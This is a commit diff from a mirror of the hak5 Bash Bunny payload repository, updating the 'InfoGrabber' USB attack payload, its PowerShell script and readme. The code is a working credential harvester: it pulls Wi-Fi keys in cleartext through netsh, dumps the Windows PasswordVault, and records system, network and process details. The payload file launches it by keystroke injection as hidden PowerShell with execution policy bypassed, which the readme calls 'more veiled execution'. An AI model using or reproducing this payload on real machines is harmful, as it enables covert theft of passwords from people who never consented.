hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Updated InfoGrabber payload (#279)

Browse Source
This commit is contained in:
DannyK999
2017-10-26 10:38:08 +10:00
committed by Sebastian Kinne
parent c58e10dcab
commit 060d5744b0
3 changed files with 27 additions and 52 deletions
Download Patch File Download Diff File Expand all files Collapse all files

40
payloads/library/recon/InfoGrabber/info.ps1
View File

@@ -1,8 +1,9 @@
# Shows details of currently running PC # Shows details of currently running PC
# Simen Kjeserud (Original creator), Gachnang # Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0)
#Get info about pc #Get info about pc
# Get IP / Nework Info
try try
{ {
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
@@ -21,6 +22,7 @@ $IsDHCPEnabled = $true
[string[]]$computerMAC =$Network.MACAddress [string[]]$computerMAC =$Network.MACAddress
} }
#Get System Info
$computerSystem = Get-CimInstance CIM_ComputerSystem $computerSystem = Get-CimInstance CIM_ComputerSystem
$computerBIOS = Get-CimInstance CIM_BIOSElement $computerBIOS = Get-CimInstance CIM_BIOSElement
@@ -47,11 +49,10 @@ if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").
$RDP = "RDP is NOT enabled" $RDP = "RDP is NOT enabled"
} }
# Get network interfaces # Get Network Interfaces
#| where { $_.ipaddress -notlike $null }
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress $Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get wifi SSID and password # Get wifi SSIDs and Passwords
$WLANProfileNames =@() $WLANProfileNames =@()
#Get all the WLAN profile names #Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : " $Output = netsh.exe wlan show profiles | Select-String -pattern " : "
@@ -82,8 +83,7 @@ $luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Na
# process first # process first
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine $process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
# get listeners / ActiveTcpConnections # Get Listeners / ActiveTcpConnections
#[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpConnections() | Format-Table -AutoSize
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess $listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object { $listener = $listener | foreach-object {
$listenerItem = $_ $listenerItem = $_
@@ -113,29 +113,7 @@ $drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $nu
# videocard # videocard
$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution $videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution
#Get installed passwords #Get stored passwords
$profileRows = $output | Select-String -Pattern 'All User Profile'
$profileNames = New-Object System.Collections.ArrayList
for($i = 0; $i -lt $profileRows.Count; $i++){
$profileName = ($profileRows[$i] -split ":")[-1].Trim()
$profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear
$SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name'
$profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"'
$passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content'
if($passwordSearchResult){
$profilePw = ($passwordSearchResult -split ":")[-1].Trim()
} else {
$profilePw = ''
}
$networkObject = New-Object -TypeName psobject -Property @{
ProfileName = $profileName
SSID = $profileSSID
Password = $profilePw
}
$profileNames.Add($networkObject)
}
$profileNames.Add($networkObject)
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault $vault = New-Object Windows.Security.Credentials.PasswordVault
$vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } $vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
@@ -180,7 +158,7 @@ $computerSystem.Name
"Network: " "Network: "
"==================================================================" "=================================================================="
"Computers MAC address: " + $computerMAC "Computers MAC address: " + $computerMAC
"Computers IP address: " + $computerIP.ipaddress[0] "Computers IP address: " + $computerIP.ipaddress[0]
"Public IP address: " + $computerPubIP "Public IP address: " + $computerPubIP
"RDP: " + $RDP "RDP: " + $RDP
"" ""
@@ -210,5 +188,3 @@ $computerSystem.Name
"Windows/user passwords" "Windows/user passwords"
"==================================================================" "=================================================================="
$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize $vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize

20
payloads/library/recon/InfoGrabber/payload.txt
View File

@@ -1,11 +1,12 @@
#!/bin/bash #!/bin/bash
# #
# Title: Info_Grabber # Title: Info_Grabber
# Author: Simen Kjeserud # Original Author: Simen Kjeserud
# Version: 1.0 # V2.0 Author: DannyK999
# Target: Windows # Version: 2.0
# Creds: Hak5Darren for inspiration # Target: Windows
# # Creds: Hak5Darren, Hak5 and Simen Kjeserud for inspiration
#
# Executes run.ps1 which executes scripts that gets you information about # Executes run.ps1 which executes scripts that gets you information about
# the computer running and will also get wifi passwords # the computer running and will also get wifi passwords
@@ -15,9 +16,6 @@ ATTACKMODE HID STORAGE
GET SWITCH_POSITION GET SWITCH_POSITION
LED ATTACK LED ATTACK
QUACK GUI r # Run the run.ps1 script in the BashBunny
QUACK DELAY 200 RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
# Open run and run the run.ps1 script in the Bashbunny
QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
QUACK ENTER
LED FINISH LED FINISH

19
payloads/library/recon/InfoGrabber/readme.md
View File

@@ -1,10 +1,13 @@
# InfoGrabber for the Bunnys # Info Grabber for the BashBunny
Author: Simen Kjeserud Original Author Simen Kjeserud
Version: Version 1.0 V2.0 Author: DannyK999
Version: Version 2.0
Credit: Hak5Darren, Hak5 and Simen Kjeserud for inspiration
Credit: Hak5Darren for inspiration
((`\ ((`\
___ \\ '--._ ___ \\ '--._
@@ -12,13 +15,15 @@ Credit: Hak5Darren for inspiration
/ \ '. __.' / \ '. __.'
_| /_ \ \_\_ _| /_ \ \_\_
{_\______\-'\__\_\ {_\______\-'\__\_\
Check out my website: Check out Simen's website:
aknemis.com aknemis.com
## Description ## Description
Gather a lot of information about the computer and place it in a text file in loot/info/. Gather a lot of information about the computer and place it in a text file in loot/info/.
Updates include code/output cleanup, faster runtime, and more veiled execution.
Here you can se what it will look like: Here you can se what it will look like:
@@ -64,10 +69,6 @@ Here you can se what it will look like:
Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input. Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input.
## Requirements
DuckyTools for the BashBunny, and you need to change to the language the computer uses.
## STATUS ## STATUS
| LED | Status | | LED | Status |